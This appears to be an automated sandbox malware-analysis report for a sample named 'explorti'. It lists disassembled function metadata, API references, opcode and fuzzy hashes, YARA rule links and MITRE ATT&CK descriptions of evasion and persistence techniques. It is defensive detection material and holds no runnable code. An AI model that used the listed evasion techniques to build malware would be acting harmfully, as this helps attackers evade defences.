Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 5db7ff38222cfc26c83bf9d7241e2ce3797aaacea9002e84bebc70fe35c01001
Instruction ID: 87e266b135a304ee1cd6307e661f30f63f491dc40561d4df6813c2c0b6e00315
Opcode Fuzzy Hash: 5db7ff38222cfc26c83bf9d7241e2ce3797aaacea9002e84bebc70fe35c01001
Instruction Fuzzy Hash: 8F014E77619B122226192418BD0263B17C8DBC2BBA715642FFEC4F73C1DE44DC564190

Function 00E22E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00E22F1F
__Mtx_unlock.LIBCPMT ref: 00E22F8C
__Cnd_broadcast.LIBCPMT ref: 00E22FA3
__Mtx_unlock.LIBCPMT ref: 00E230B5
__Mtx_unlock.LIBCPMT ref: 00E2315B

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 4573af546ff0684a76d3d4da8c0fd4e916f1d4d0d96192ccc43016b0c4978aab
Instruction ID: 9bc0dc2089fb6668061f2635876cfb5c13ea2b88becf77cdeff870b3c8401f93
Opcode Fuzzy Hash: 4573af546ff0684a76d3d4da8c0fd4e916f1d4d0d96192ccc43016b0c4978aab
Instruction Fuzzy Hash: EFA1F070A01225AFEB10DF74D948B9ABBF8BF14318F105129E905F7281EB35EA04CBD1

Function 00E22670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E22806
___std_exception_destroy.LIBVCRUNTIME ref: 00E228A0

Strings

P#, xrefs: 00E227BE, 00E22899
P#, xrefs: 00E22811

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#$P#
API String ID: 2970364248-2117210794
Opcode ID: e52d8dbdb22ff1b9f2dda7e6efa7a8faf595203b1b6168ee10768c79c695a1b2
Instruction ID: 5838966917d84286e77f6b95a0f5ff33d03e51b5e7840c14e770aee72ab2e049
Opcode Fuzzy Hash: e52d8dbdb22ff1b9f2dda7e6efa7a8faf595203b1b6168ee10768c79c695a1b2
Instruction Fuzzy Hash: 10719071E00218ABDB08CFA8D885BDDFBF5EF58310F14812DE805B7281EB75A944CBA5

Function 00E22AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E22B23

Strings

P#, xrefs: 00E22B2E
This function cannot be called on a default constructed task, xrefs: 00E22B03
P#, xrefs: 00E22B18

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#$P#$This function cannot be called on a default constructed task
API String ID: 2659868963-730510960
Opcode ID: 3e071ab8e29e48574514d3ff41532d8bbeae5e9b9718e56139a8d954688ae503
Instruction ID: 0359590a54f1bb3d2476c99e3f631657a8f21f43276180e852b38bb0325f5dd8
Opcode Fuzzy Hash: 3e071ab8e29e48574514d3ff41532d8bbeae5e9b9718e56139a8d954688ae503
Instruction Fuzzy Hash: 07F0F670A1030CABC710DF68A84199EBBED9F55300F5091AEF908B7601EB70AA48CB95

Function 00E22440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E2247E

Strings

'k, xrefs: 00E22440
P#, xrefs: 00E2246D
P#, xrefs: 00E22486

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k$P#$P#
API String ID: 2659868963-1828297684
Opcode ID: f5677d638d702f35018786e0dc8ee9efbaffab0dc7190743342b8eef28cdf711
Instruction ID: 0b6b9558d073e274192fadd0c6b2f2bcf2563c8cfa29d9bd4a29dc56b96d6e8d
Opcode Fuzzy Hash: f5677d638d702f35018786e0dc8ee9efbaffab0dc7190743342b8eef28cdf711
Instruction Fuzzy Hash: FFF0A0B291020D6BC714EAE4D80288AB3ECDA15340B009A26FA48BB501F7B0FA488792

Function 00E5C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E5CA37

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 1896024a5128c8aa8275b63b761b48018d4bb692acb38c169b723e0c994b6f93
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 0FB145329003459FDB11CF28C8A17AEBBE1EF55345F3499AAEC49BB342D6348D49CB60

Function 00E3BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00E3BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00E3BB14
_xtime_get.LIBCPMT ref: 00E3BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00E3BB43

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 151eaac41974cc1240475f28b9694ca8c0cd24d6425fd7e785ad5508df8bae14
Instruction ID: 5863460d7f385ab88f25f557820a99ad2e70abc70cb514558fec97f0620c087d
Opcode Fuzzy Hash: 151eaac41974cc1240475f28b9694ca8c0cd24d6425fd7e785ad5508df8bae14
Instruction Fuzzy Hash: EF213D72A00209AFDF10EFA5DC499BEBBB8AF48714F100069F601B7261DB34ED41CBA1

Function 00E37040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00E3726C

Strings

@., xrefs: 00E37250
`z, xrefs: 00E37282

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.$`z
API String ID: 3366076730-840869247
Opcode ID: 4698535ed65c78681f7fb32fa75739a5a15caa5949ba6dd211a08dd0e490a1d5
Instruction ID: 36ebbcccf5da72dfbad8997d22e14edafb1b53f34d233d8ead98f81c5d3fd2dd
Opcode Fuzzy Hash: 4698535ed65c78681f7fb32fa75739a5a15caa5949ba6dd211a08dd0e490a1d5
Instruction Fuzzy Hash: 00A127B1A01619CFDB21CFA8C98879EBBF0AF48714F188199E85AAB351D7759D01CF90

Function 00E5F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00E5F263

Strings

`', xrefs: 00E5F235
8", xrefs: 00E5F30B

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"$`'
API String ID: 3903695350-1436819768
Opcode ID: c03f70bc10adc56934cbac06d315555381a8495c741f0f6213d70bd3cc9bbb28
Instruction ID: 1f0e94d784d11ae65fd724a03ac2ec9361a63608007fb51e518dff2f14a91b9e
Opcode Fuzzy Hash: c03f70bc10adc56934cbac06d315555381a8495c741f0f6213d70bd3cc9bbb28
Instruction Fuzzy Hash: 4D318F755003089FEB20AB79D905B56B3E8AF00316F646D39EC4AF7161DF71EC488B11

Function 00E23930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00E23962
__Mtx_init_in_situ.LIBCPMT ref: 00E239A1

Strings

pB, xrefs: 00E23940

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB
API String ID: 3366076730-2061397439
Opcode ID: a3152012196e51fc571caa09eefb8fb205ed315e1d6e6fe062082760c50be7ed
Instruction ID: d8341bc9504ddf8ac9c8ad8122de6f86cb7139b7315dd9b80c0418229813cb66
Opcode Fuzzy Hash: a3152012196e51fc571caa09eefb8fb205ed315e1d6e6fe062082760c50be7ed
Instruction Fuzzy Hash: A04124B45017059FD720CF28C588B5ABBF0FF84315F208619E96A9B341EBB9EA45CF80

Function 00E22520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E22552

Strings

P#, xrefs: 00E22547
P#, xrefs: 00E2255D

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#$P#
API String ID: 2659868963-2117210794
Opcode ID: 5dcc752ea845690ee22dd3efbd443213ffa916db65e01a6c999ecf6751ff5899
Instruction ID: 4bd9a72b68b9d4e8db71d769ef402d3cfd8030c0c14bd7cf1d93ad975965bbb7
Opcode Fuzzy Hash: 5dcc752ea845690ee22dd3efbd443213ffa916db65e01a6c999ecf6751ff5899
Instruction Fuzzy Hash: ECF0A771E1020DDFC714DFA8D84198EBBF4AF59300F10C6AEE848B7200EB719A58CB95

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

